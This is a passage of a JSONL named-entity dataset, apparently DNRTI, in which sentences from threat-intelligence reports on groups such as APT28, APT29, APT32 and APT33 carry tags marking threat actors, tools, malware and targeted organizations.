use of public websites to hide in plain sight .", "spans": {"TOOL: BLACKCOFFEE": [[11, 22]], "THREAT_ACTOR: APT17": [[36, 
41]]}, "info": {"id": "dnrti_train_000066", "source": "dnrti_train"}} {"text": "TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology .", "spans": {"THREAT_ACTOR: TG-0416": [[0, 7]], "THREAT_ACTOR: Advanced Persistent Threat": [[47, 73]], "THREAT_ACTOR: APT": [[76, 79]], "ORGANIZATION: human rights groups": [[205, 224]]}, "info": {"id": "dnrti_train_000067", "source": "dnrti_train"}} {"text": "The APT18 then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system .", "spans": {"THREAT_ACTOR: APT18": [[4, 9]], "TOOL: hcdLoader RAT": [[29, 42]]}, "info": {"id": "dnrti_train_000068", "source": "dnrti_train"}} {"text": "The malware used by the Wekby group has ties to the HTTPBrowser malware family , and uses DNS requests as a command and control mechanism .", "spans": {"THREAT_ACTOR: Wekby group": [[24, 35]], "TOOL: HTTPBrowser malware family": [[52, 78]]}, "info": {"id": "dnrti_train_000069", "source": "dnrti_train"}} {"text": "These URIs result in the download of an installer , which creates a PE of the malware typically known as HTTPBrowser , but called Token Control by the Wekby group themselves ( based upon the PDB strings found within many of the samples ) .", "spans": {"TOOL: HTTPBrowser": [[105, 116]], "TOOL: Token Control": [[130, 143]], "THREAT_ACTOR: Wekby group": [[151, 162]]}, "info": {"id": "dnrti_train_000070", "source": "dnrti_train"}} {"text": "APT19 seemed to be going after defense sector firms , Chinese dissident groups and political , financial , pharmaceutical and energy sectors that could benefit the Chinese economy .", "spans": {"THREAT_ACTOR: APT19": [[0, 5]], "ORGANIZATION: defense sector firms": [[31, 51]], "ORGANIZATION: energy sectors": [[126, 140]]}, 
"info": {"id": "dnrti_train_000071", "source": "dnrti_train"}} {"text": "APT19 seemed to be going after defense sector firms , Chinese dissident groups and other political target , as well as certain financial targets and other commercial targets in pharmaceutical and energy sectors that could benefit the Chinese economy .", "spans": {"THREAT_ACTOR: APT19": [[0, 5]], "ORGANIZATION: defense sector firms": [[31, 51]], "ORGANIZATION: energy sectors": [[196, 210]]}, "info": {"id": "dnrti_train_000072", "source": "dnrti_train"}} {"text": "APT28 malware , in particular the family of modular backdoors that we call CHOPSTICK , indicates a formal code development environment .", "spans": {"TOOL: APT28 malware": [[0, 13]], "TOOL: CHOPSTICK": [[75, 84]]}, "info": {"id": "dnrti_train_000074", "source": "dnrti_train"}} {"text": "However , three themes in APT28 's targeting clearly reflects areas of specific interest to an Eastern European government , most likely the Russian government .", "spans": {"THREAT_ACTOR: APT28": [[26, 31]]}, "info": {"id": "dnrti_train_000075", "source": "dnrti_train"}} {"text": "We identified three themes in APT28 's lures and registered domains , which together are particularly relevant to the Russian government .", "spans": {"THREAT_ACTOR: APT28": [[30, 35]]}, "info": {"id": "dnrti_train_000076", "source": "dnrti_train"}} {"text": "Georgian military security issues , particularly with regard to U.S. 
cooperation and NATO , provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics .", "spans": {"THREAT_ACTOR: threat actors": [[147, 160]]}, "info": {"id": "dnrti_train_000077", "source": "dnrti_train"}} {"text": "APT28 's malware settings suggest that the developers have done the majority of their work in a Russian language build environment during Russian business hours , which suggests that the Russian government is APT28 's sponsor .", "spans": {"THREAT_ACTOR: APT28": [[0, 5], [209, 214]]}, "info": {"id": "dnrti_train_000079", "source": "dnrti_train"}} {"text": "We believe that APT28 's targeting of the MOD aligns with Russian threat perceptions .", "spans": {"THREAT_ACTOR: APT28": [[16, 21]]}, "info": {"id": "dnrti_train_000080", "source": "dnrti_train"}} {"text": "We assess that APT28 is most likely sponsored by the Russian government .", "spans": {"THREAT_ACTOR: APT28": [[15, 20]]}, "info": {"id": "dnrti_train_000081", "source": "dnrti_train"}} {"text": "Given the available data , we assess that APT28 's work is sponsored by the Russian government .", "spans": {"THREAT_ACTOR: APT28": [[42, 47]]}, "info": {"id": "dnrti_train_000082", "source": "dnrti_train"}} {"text": "The targets of TG-4127 include military , government and defense sectors .", "spans": {"THREAT_ACTOR: TG-4127": [[15, 22]], "ORGANIZATION: defense sectors": [[57, 72]]}, "info": {"id": "dnrti_train_000084", "source": "dnrti_train"}} {"text": "Some of APT28 's more commonly used tools are the SOURFACE downloader , its second stage backdoor EVILTOSS , and a modular family of implants that we call CHOPSTICK .", "spans": {"THREAT_ACTOR: APT28": [[8, 13]], "TOOL: SOURFACE downloader": [[50, 69]], "TOOL: EVILTOSS": [[98, 106]], "TOOL: modular family of implants": [[115, 141]], "TOOL: CHOPSTICK": [[155, 164]]}, "info": {"id": "dnrti_train_000085", "source": "dnrti_train"}} {"text": "Our visibility into the operations of APT28 - a group 
we believe the Russian Government sponsors - has given us insight into some of the government 's targets , as well as its objectives and the activities designed to further them .", "spans": {"THREAT_ACTOR: APT28": [[38, 43]], "THREAT_ACTOR: group": [[48, 53]]}, "info": {"id": "dnrti_train_000089", "source": "dnrti_train"}} {"text": "APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government .", "spans": {"ORGANIZATION: media entities": [[183, 197]], "ORGANIZATION: dissidents": [[204, 214]], "ORGANIZATION: figures": [[219, 226]]}, "info": {"id": "dnrti_train_000091", "source": "dnrti_train"}} {"text": "After compromising a political organization , APT28 will steal internal data .", "spans": {"ORGANIZATION: political organization": [[21, 43]], "THREAT_ACTOR: APT28": [[46, 51]]}, "info": {"id": "dnrti_train_000095", "source": "dnrti_train"}} {"text": "On December 29 , 2016 , the Department of Homeland Security ( DHS ) and Federal Bureau of Investigation ( FBI ) released a Joint Analysis Report confirming FireEye 's long held public assessment that the Russian Government sponsors APT28 .", "spans": {"ORGANIZATION: Department of Homeland Security": [[28, 59]], "ORGANIZATION: DHS": [[62, 65]], "ORGANIZATION: FBI": [[106, 109]], "ORGANIZATION: FireEye": [[156, 163]], "THREAT_ACTOR: APT28": [[232, 237]]}, "info": {"id": "dnrti_train_000096", "source": "dnrti_train"}} {"text": "In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations , and characterized APT28 's activity as aligning with the Russian Government 's strategic intelligence requirements .", "spans": {"ORGANIZATION: FireEye": [[18, 25]], "THREAT_ACTOR: APT28": [[35, 40], [114, 119]]}, "info": {"id": "dnrti_train_000097", "source": "dnrti_train"}} {"text": "In October 
2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations' , and characterized APT28 's activity as aligning with the Russian Government 's strategic intelligence requirements .", "spans": {"ORGANIZATION: FireEye": [[18, 25]], "THREAT_ACTOR: APT28": [[35, 40], [115, 120]]}, "info": {"id": "dnrti_train_000098", "source": "dnrti_train"}} {"text": "APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]], "ORGANIZATION: rockers": [[22, 29]], "ORGANIZATION: dissidents": [[34, 44]]}, "info": {"id": "dnrti_train_000099", "source": "dnrti_train"}} {"text": "Our investigation of APT28 's compromise of WADA 's network , and our observations of the surrounding events reveal how Russia sought to counteract a damaging narrative and delegitimize the institutions leveling criticism .", "spans": {"THREAT_ACTOR: APT28": [[21, 26]]}, "info": {"id": "dnrti_train_000100", "source": "dnrti_train"}} {"text": "For full details , please reference our 2014 report , APT28 : A Window into Russia 's Cyber Espionage Operations .", "spans": {"THREAT_ACTOR: APT28": [[54, 59]]}, "info": {"id": "dnrti_train_000103", "source": "dnrti_train"}} {"text": "The APT28 , which is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America .", "spans": {"THREAT_ACTOR: APT28": [[4, 9]]}, "info": {"id": "dnrti_train_000105", "source": "dnrti_train"}} {"text": "Several sources consider APT28 a group of CyberMercs based in Russia .", "spans": {"THREAT_ACTOR: APT28": [[25, 30]], "THREAT_ACTOR: group": [[33, 38]]}, "info": {"id": "dnrti_train_000107", "source": "dnrti_train"}} {"text": "The primary targets of APT28 are potential victims in several countries such as Ukraine , Spain , Russia , Romania , the United States and Canada .", "spans": {"THREAT_ACTOR: APT28": [[23, 28]]}, 
"info": {"id": "dnrti_train_000108", "source": "dnrti_train"}} {"text": "We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian .", "spans": {"THREAT_ACTOR: operators": [[36, 45]], "THREAT_ACTOR: APT28": [[53, 58]], "ORGANIZATION: citizens": [[86, 94], [98, 106]]}, "info": {"id": "dnrti_train_000109", "source": "dnrti_train"}} {"text": "Finally , the use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlight APT28 's ability and interest in exploiting geopolitical events for their operations .", "spans": {"THREAT_ACTOR: APT28": [[131, 136]]}, "info": {"id": "dnrti_train_000111", "source": "dnrti_train"}} {"text": "In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM , JHUHUGIT , AZZY and a few others .", "spans": {"THREAT_ACTOR: Sofacy group": [[14, 26]], "TOOL: CORESHELL": [[97, 106]], "TOOL: SPLM": [[109, 113]], "TOOL: JHUHUGIT": [[116, 124]], "TOOL: AZZY": [[127, 131]]}, "info": {"id": "dnrti_train_000112", "source": "dnrti_train"}} {"text": "The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"THREAT_ACTOR: Sofacy group": [[4, 16]], "VULNERABILITY: Flash exploits": [[60, 74]], "TOOL: Carberp": [[92, 99]], "TOOL: JHUHUGIT downloaders": [[106, 126]]}, "info": {"id": "dnrti_train_000114", "source": "dnrti_train"}} {"text": "APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]], "VULNERABILITY: Flash exploits": [[49, 63]], "TOOL: Carberp": [[81, 88]], "TOOL: JHUHUGIT downloaders": [[95, 115]]}, "info": {"id": "dnrti_train_000115", "source": "dnrti_train"}} {"text": "The group spearphished targets in 
several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: Flash exploits": [[53, 67]], "TOOL: Carberp": [[85, 92]], "TOOL: JHUHUGIT downloaders": [[99, 119]]}, "info": {"id": "dnrti_train_000116", "source": "dnrti_train"}} {"text": "Their evolving and modified SPLM , CHOPSTICK , XAgent code is a long-standing part of Sofacy activity , however much of it is changing .", "spans": {"TOOL: SPLM": [[28, 32]], "TOOL: CHOPSTICK": [[35, 44]], "TOOL: XAgent": [[47, 53]]}, "info": {"id": "dnrti_train_000117", "source": "dnrti_train"}} {"text": "Compared to other backdoor tools associated with the Sofacy group , the use of Zebrocy in attack campaigns is far more widespread .", "spans": {"TOOL: backdoor tools": [[18, 32]], "THREAT_ACTOR: Sofacy group": [[53, 65]], "TOOL: Zebrocy": [[79, 86]]}, "info": {"id": "dnrti_train_000121", "source": "dnrti_train"}} {"text": "As alluded to in our previous blog regarding the Cannon tool , the Sofacy group ( AKA Fancy Bear , APT28 , STRONTIUM , Pawn Storm , Sednit ) has persistently attacked various government and private organizations around the world from mid-October 2018 through mid-November 2018 .", "spans": {"TOOL: Cannon tool": [[49, 60]], "THREAT_ACTOR: Sofacy group": [[67, 79]], "THREAT_ACTOR: Fancy Bear": [[86, 96]], "THREAT_ACTOR: APT28": [[99, 104]], "THREAT_ACTOR: STRONTIUM": [[107, 116]], "THREAT_ACTOR: Pawn Storm": [[119, 129]], "THREAT_ACTOR: Sednit": [[132, 138]]}, "info": {"id": "dnrti_train_000122", "source": "dnrti_train"}} {"text": "Russian citizens—journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm .", "spans": {"ORGANIZATION: citizens—journalists": [[8, 28]], "ORGANIZATION: software developers": [[31, 50]], "ORGANIZATION: politicians": [[53, 64]], "ORGANIZATION: researchers at universities": [[67, 94]], "ORGANIZATION: artists": 
[[101, 108]], "THREAT_ACTOR: Pawn Storm": [[130, 140]]}, "info": {"id": "dnrti_train_000123", "source": "dnrti_train"}} {"text": "While the JHUHUGIT ( and more recently , \" JKEYSKW \" ) implant used in most of the Sofacy attacks , high profile victims are being targeted with another first level implant , representing the latest evolution of their AZZY Trojan .", "spans": {"TOOL: JHUHUGIT": [[10, 18]], "TOOL: JKEYSKW": [[43, 50]], "TOOL: AZZY Trojan": [[218, 229]]}, "info": {"id": "dnrti_train_000125", "source": "dnrti_train"}} {"text": "Once a foothold is established , Sofacy trys to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement .", "spans": {"THREAT_ACTOR: Sofacy": [[33, 39]], "TOOL: backdoors": [[60, 69]], "TOOL: USB stealers": [[72, 84]], "TOOL: Mimikatz": [[126, 134]]}, "info": {"id": "dnrti_train_000126", "source": "dnrti_train"}} {"text": "Once a foothold is established , they try to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement .", "spans": {"TOOL: backdoors": [[57, 66]], "TOOL: USB stealers": [[69, 81]], "TOOL: Mimikatz": [[123, 131]]}, "info": {"id": "dnrti_train_000127", "source": "dnrti_train"}} {"text": "Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows .", "spans": {"TOOL: Komplex": [[0, 7]], "THREAT_ACTOR: Sofacy": [[90, 96], [124, 130]], "TOOL: Carberp": [[103, 110]]}, "info": {"id": "dnrti_train_000130", "source": "dnrti_train"}} {"text": "The Sofacy group created the Komplex Trojan to use in attack campaigns targeting the OS X operating system – a move that showcases their continued evolution toward multi-platform attacks .", "spans": {"THREAT_ACTOR: Sofacy group": [[4, 16]], "TOOL: Komplex Trojan": [[29, 43]]}, "info": {"id": "dnrti_train_000131", "source": "dnrti_train"}} 
{"text": "The Komplex Trojan revealed a design similar to Sofacy 's Carberp variant Trojan , which we believe may have been done in order to handle compromised Windows and OS X systems using the same C2 server application with relative ease .", "spans": {"TOOL: Komplex Trojan": [[4, 18]], "THREAT_ACTOR: Sofacy": [[48, 54]], "TOOL: Carberp": [[58, 65]]}, "info": {"id": "dnrti_train_000132", "source": "dnrti_train"}} {"text": "This whitepaper explores the tools - such as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , etc- of the Dukes , a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making .", "spans": {"TOOL: MiniDuke": [[45, 53]], "TOOL: CosmicDuke": [[56, 66]], "TOOL: OnionDuke": [[69, 78]], "TOOL: CozyDuke": [[81, 89]], "THREAT_ACTOR: Dukes": [[104, 109]], "THREAT_ACTOR: cyberespionage group": [[162, 182]]}, "info": {"id": "dnrti_train_000133", "source": "dnrti_train"}} {"text": "The origins of the Duke toolset names can be traced back to when researchers at Kaspersky Labs coined the term \" MiniDuke \" to identify the first Duke-related malware they found .", "spans": {"ORGANIZATION: Kaspersky Labs": [[80, 94]], "TOOL: MiniDuke": [[113, 121]], "TOOL: Duke-related malware": [[146, 166]]}, "info": {"id": "dnrti_train_000136", "source": "dnrti_train"}} {"text": "As researchers continued discovering new toolsets that were created and used by the same group that had been operating MiniDuke , and thus the threat actor operating the toolsets started to be commonly referred to as \" Dukes \" .", "spans": {"THREAT_ACTOR: group": [[89, 94]], "TOOL: MiniDuke": [[119, 127]], "THREAT_ACTOR: threat actor": [[143, 155]], "THREAT_ACTOR: Dukes": [[219, 224]]}, "info": {"id": "dnrti_train_000137", "source": "dnrti_train"}} {"text": "Importantly , PinchDuke trojan samples always contain a notable text 
string , which we believe is used as a campaign identifier by the Dukes group to distinguish between multiple attack campaigns that are run in parallel .", "spans": {"TOOL: PinchDuke trojan samples": [[14, 38]], "THREAT_ACTOR: Dukes group": [[135, 146]]}, "info": {"id": "dnrti_train_000139", "source": "dnrti_train"}} {"text": "This neatly ties together many of the tools used by the Dukes group , as versions of this one loader have been used to load malware from three different Dukes-related toolsets CosmicDuke , PinchDuke , and MiniDuke – over the course of five years .", "spans": {"THREAT_ACTOR: Dukes group": [[56, 67]], "TOOL: CosmicDuke": [[176, 186]], "TOOL: PinchDuke": [[189, 198]], "TOOL: MiniDuke": [[205, 213]]}, "info": {"id": "dnrti_train_000140", "source": "dnrti_train"}} {"text": "In the latter case however , the Dukes group appear to have also simultaneously developed an entirely new loader , which we first observed being used in conjunction with CosmicDuke during the spring of 2015 .", "spans": {"THREAT_ACTOR: Dukes group": [[33, 44]], "TOOL: CosmicDuke": [[170, 180]]}, "info": {"id": "dnrti_train_000146", "source": "dnrti_train"}} {"text": "The Dukes could have ceased all use of CosmicDuke ( at least until they had developed a new loader ) or retired it entirely , since they still had other toolsets available .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]], "TOOL: CosmicDuke": [[39, 49]]}, "info": {"id": "dnrti_train_000147", "source": "dnrti_train"}} {"text": "For these CozyDuke campaigns however , the Dukes appear to have employed two particular later-stage toolsets , SeaDuke and HammerDuke .", "spans": {"THREAT_ACTOR: Dukes": [[43, 48]], "TOOL: SeaDuke": [[111, 118]], "TOOL: HammerDuke": [[123, 133]]}, "info": {"id": "dnrti_train_000148", "source": "dnrti_train"}} {"text": "All of the available evidence however does in our opinion suggest that the group operates on behalf of the Russian Federation .", "spans": {"THREAT_ACTOR: group": [[75, 80]]}, 
"info": {"id": "dnrti_train_000152", "source": "dnrti_train"}} {"text": "Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years .", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "THREAT_ACTOR: attackers": [[43, 52]], "THREAT_ACTOR: APT29": [[53, 58]]}, "info": {"id": "dnrti_train_000154", "source": "dnrti_train"}} {"text": "APT29 has used The Onion Router and the TOR domain fronting plugin meek to create a hidden , encrypted network tunnel that appeared to connect to Google services over TLS .", "spans": {"THREAT_ACTOR: APT29": [[0, 5]], "TOOL: The Onion Router": [[15, 31]], "TOOL: TOR domain fronting plugin meek": [[40, 71]], "ORGANIZATION: Google": [[146, 152]]}, "info": {"id": "dnrti_train_000155", "source": "dnrti_train"}} {"text": "Mandiant has observed APT29 using a stealthy backdoor that we call POSHSPY .", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "THREAT_ACTOR: APT29": [[22, 27]], "TOOL: POSHSPY": [[67, 74]]}, "info": {"id": "dnrti_train_000156", "source": "dnrti_train"}} {"text": "Mandiant has since identified POSHSPY in several other environments compromised by APT29 over the past two years .", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "TOOL: POSHSPY": [[30, 37]], "THREAT_ACTOR: APT29": [[83, 88]]}, "info": {"id": "dnrti_train_000157", "source": "dnrti_train"}} {"text": "In the investigations Mandiant has conducted , it appeared that APT29 deployed POSHSPY as a secondary backdoor for use if they lost access to their primary backdoors .", "spans": {"ORGANIZATION: Mandiant": [[22, 30]], "THREAT_ACTOR: APT29": [[64, 69]], "TOOL: POSHSPY": [[79, 86]]}, "info": {"id": "dnrti_train_000158", "source": "dnrti_train"}} {"text": "POSHSPY is an excellent example of the skill and craftiness of APT29 .", "spans": {"TOOL: POSHSPY": [[0, 7]], "THREAT_ACTOR: APT29": [[63, 68]]}, "info": {"id": "dnrti_train_000159", "source": "dnrti_train"}} 
{"text": "FireEye assesses that APT32 leverages a unique suite of fully-featured malware , in conjunction with commercially-available tools , to conduct targeted operations that are aligned with Vietnamese state interests .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT32": [[22, 27]]}, "info": {"id": "dnrti_train_000160", "source": "dnrti_train"}} {"text": "In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 .", "spans": {"THREAT_ACTOR: APT32": [[78, 83]], "ORGANIZATION: dissidents": [[146, 156]], "ORGANIZATION: journalists": [[161, 172]]}, "info": {"id": "dnrti_train_000161", "source": "dnrti_train"}} {"text": "From 2016 through 2017 , two subsidiaries of U.S. and Philippine consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations .", "spans": {"ORGANIZATION: consumer products corporations": [[65, 95]], "THREAT_ACTOR: APT32": [[142, 147]]}, "info": {"id": "dnrti_train_000162", "source": "dnrti_train"}} {"text": "From 2016 through 2017 , two consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations .", "spans": {"ORGANIZATION: consumer products corporations": [[29, 59]], "THREAT_ACTOR: APT32": [[106, 111]]}, "info": {"id": "dnrti_train_000163", "source": "dnrti_train"}} {"text": "In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": {"THREAT_ACTOR: APT32": [[10, 15]], "MALWARE: Vietnam.exe": [[114, 125]], "ORGANIZATION: diaspora": [[185, 193]]}, "info": {"id": "dnrti_train_000164", "source": "dnrti_train"}} {"text": "In 2015 and 2016 , two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32 .", "spans": 
{"ORGANIZATION: FireEye": [[80, 87]], "THREAT_ACTOR: APT32": [[113, 118]]}, "info": {"id": "dnrti_train_000165", "source": "dnrti_train"}} {"text": "In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" .", "spans": {"THREAT_ACTOR: APT32": [[10, 15]], "MALWARE: Vietnam.exe": [[114, 125]]}, "info": {"id": "dnrti_train_000166", "source": "dnrti_train"}} {"text": "Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam 's manufacturing , consumer products , and hospitality sectors .", "spans": {"ORGANIZATION: FireEye": [[22, 29]], "THREAT_ACTOR: APT32": [[43, 48]], "ORGANIZATION: hospitality sectors": [[157, 176]]}, "info": {"id": "dnrti_train_000167", "source": "dnrti_train"}} {"text": "APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD , KOMPROGO , SOUNDBITE , and PHOREAL .", "spans": {"THREAT_ACTOR: APT32": [[0, 5]], "TOOL: WINDSHIELD": [[94, 104]], "TOOL: KOMPROGO": [[107, 115]], "TOOL: SOUNDBITE": [[118, 127]], "TOOL: PHOREAL": [[134, 141]]}, "info": {"id": "dnrti_train_000168", "source": "dnrti_train"}} {"text": "In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines .", "spans": {"THREAT_ACTOR: actor": [[58, 63]], "ORGANIZATION: diaspora": [[142, 150]], "ORGANIZATION: government employees": [[175, 195]]}, "info": {"id": "dnrti_train_000169", "source": "dnrti_train"}} {"text": "APT32 often deploys these backdoors along with the commercially-available Cobalt Strike backdoor .", "spans": {"THREAT_ACTOR: APT32": [[0, 5]], "TOOL: Cobalt Strike backdoor": [[74, 96]]}, "info": {"id": "dnrti_train_000171", "source": "dnrti_train"}} {"text": "Based on incident response investigations , product detections , and intelligence 
observations along with additional publications on the same operators , FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests .", "spans": {"THREAT_ACTOR: operators": [[142, 151]], "ORGANIZATION: FireEye": [[154, 161]], "THREAT_ACTOR: APT32": [[176, 181]], "THREAT_ACTOR: cyber espionage group": [[187, 208]]}, "info": {"id": "dnrti_train_000172", "source": "dnrti_train"}} {"text": "OceanLotus , also known as APT32 , is believed to be a Vietnam-based APT group that has become increasingly sophisticated in its attack tactics , techniques , and procedures ( TTPs ) .", "spans": {"THREAT_ACTOR: OceanLotus": [[0, 10]], "THREAT_ACTOR: APT32": [[27, 32]], "THREAT_ACTOR: APT group": [[69, 78]]}, "info": {"id": "dnrti_train_000173", "source": "dnrti_train"}} {"text": "While Volexity does not typically engage in attempting attribution of any threat actor , Volexity does agree with previously reported assessments that OceanLotus is likely operating out of Vietnam .", "spans": {"ORGANIZATION: Volexity": [[6, 14], [89, 97]], "THREAT_ACTOR: threat actor": [[74, 86]], "THREAT_ACTOR: OceanLotus": [[151, 161]]}, "info": {"id": "dnrti_train_000174", "source": "dnrti_train"}} {"text": "During that phase , the APT32 operated a fileless PowerShell-based infrastructure , using customized PowerShell payloads taken from known offensive frameworks such as Cobalt Strike , PowerSploit and Nishang .", "spans": {"THREAT_ACTOR: APT32": [[24, 29]], "TOOL: customized PowerShell": [[90, 111]], "TOOL: Cobalt Strike": [[167, 180]], "TOOL: PowerSploit": [[183, 194]], "TOOL: Nishang": [[199, 206]]}, "info": {"id": "dnrti_train_000175", "source": "dnrti_train"}} {"text": "However , over the past few years , we have been tracking a separate , less widely known suspected Iranian group with potential destructive capabilities , whom we call APT33 .", "spans": {"THREAT_ACTOR: group": [[107, 112]], "THREAT_ACTOR: APT33": [[168, 173]]}, "info": {"id": 
"dnrti_train_000176", "source": "dnrti_train"}} {"text": "Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 .", "spans": {"THREAT_ACTOR: APT33": [[26, 31]], "THREAT_ACTOR: group": [[45, 50]]}, "info": {"id": "dnrti_train_000177", "source": "dnrti_train"}} {"text": "We assess APT33 works at the behest of the Iranian government .", "spans": {"THREAT_ACTOR: APT33": [[10, 15]]}, "info": {"id": "dnrti_train_000178", "source": "dnrti_train"}} {"text": "APT33 has targeted organizations – spanning multiple industries – headquartered in the United States , Saudi Arabia and South Korea .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]]}, "info": {"id": "dnrti_train_000179", "source": "dnrti_train"}} {"text": "Cybereason also attributes the recently reported Backdoor.Win32.Denis to the OceanLotus Group , which at the time of this report 's writing , had not been officially linked to this threat actor .", "spans": {"ORGANIZATION: Cybereason": [[0, 10]], "TOOL: Backdoor.Win32.Denis": [[49, 69]], "THREAT_ACTOR: OceanLotus Group": [[77, 93]], "THREAT_ACTOR: threat actor": [[181, 193]]}, "info": {"id": "dnrti_train_000180", "source": "dnrti_train"}} {"text": "APT33 has shown particular interest in organizations in the aviation sector , as well as organizations in the energy sector with ties to petrochemical production .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: aviation sector": [[60, 75]], "ORGANIZATION: energy sector": [[110, 123]]}, "info": {"id": "dnrti_train_000181", "source": "dnrti_train"}} {"text": "From mid-2016 through early 2017 , APT33 compromised a U.S. 
organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings .", "spans": {"THREAT_ACTOR: APT33": [[35, 40]], "ORGANIZATION: organization": [[60, 72]], "ORGANIZATION: aerospace sector": [[80, 96]], "ORGANIZATION: business conglomerate": [[112, 133]]}, "info": {"id": "dnrti_train_000182", "source": "dnrti_train"}} {"text": "From mid-2016 through early 2017 , APT33 compromised organizations located in Saudi Arabia and U.S. in the aerospace sector .", "spans": {"THREAT_ACTOR: APT33": [[35, 40]], "ORGANIZATION: aerospace sector": [[107, 123]]}, "info": {"id": "dnrti_train_000183", "source": "dnrti_train"}} {"text": "During the same time period , APT33 also targeted companies in South Korea involved in oil refining and petrochemicals .", "spans": {"THREAT_ACTOR: APT33": [[30, 35]]}, "info": {"id": "dnrti_train_000184", "source": "dnrti_train"}} {"text": "More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company .", "spans": {"THREAT_ACTOR: APT33": [[30, 35]], "ORGANIZATION: organization": [[63, 75]], "ORGANIZATION: business conglomerate": [[95, 116]], "MALWARE: malicious file": [[125, 139]], "ORGANIZATION: petrochemical company": [[212, 233]]}, "info": {"id": "dnrti_train_000185", "source": "dnrti_train"}} {"text": "More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies .", "spans": {"THREAT_ACTOR: APT33": [[30, 35]], "MALWARE: malicious file": [[102, 116]]}, "info": {"id": "dnrti_train_000186", "source": "dnrti_train"}} {"text": "We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation 
capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia .", "spans": {"THREAT_ACTOR: APT33": [[112, 117]]}, "info": {"id": "dnrti_train_000187", "source": "dnrti_train"}} {"text": "APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]]}, "info": {"id": "dnrti_train_000188", "source": "dnrti_train"}} {"text": "The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups , indicating a common interest in the sectors across Iranian actors .", "spans": {"THREAT_ACTOR: threat groups": [[146, 159]], "THREAT_ACTOR: actors": [[221, 227]]}, "info": {"id": "dnrti_train_000189", "source": "dnrti_train"}} {"text": "APT33 sent spear phishing emails to employees whose jobs related to the aviation industry .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: employees": [[36, 45]]}, "info": {"id": "dnrti_train_000190", "source": "dnrti_train"}} {"text": "APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training , maintenance and support for Saudi 's military and commercial fleet .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: aviation companies": [[67, 85]]}, "info": {"id": "dnrti_train_000191", "source": "dnrti_train"}} {"text": "We identified APT33 malware tied to an Iranian persona who may have been employed by the Iranian government to conduct cyber threat activity against its adversaries .", "spans": {"TOOL: APT33 malware": [[14, 27]]}, "info": {"id": 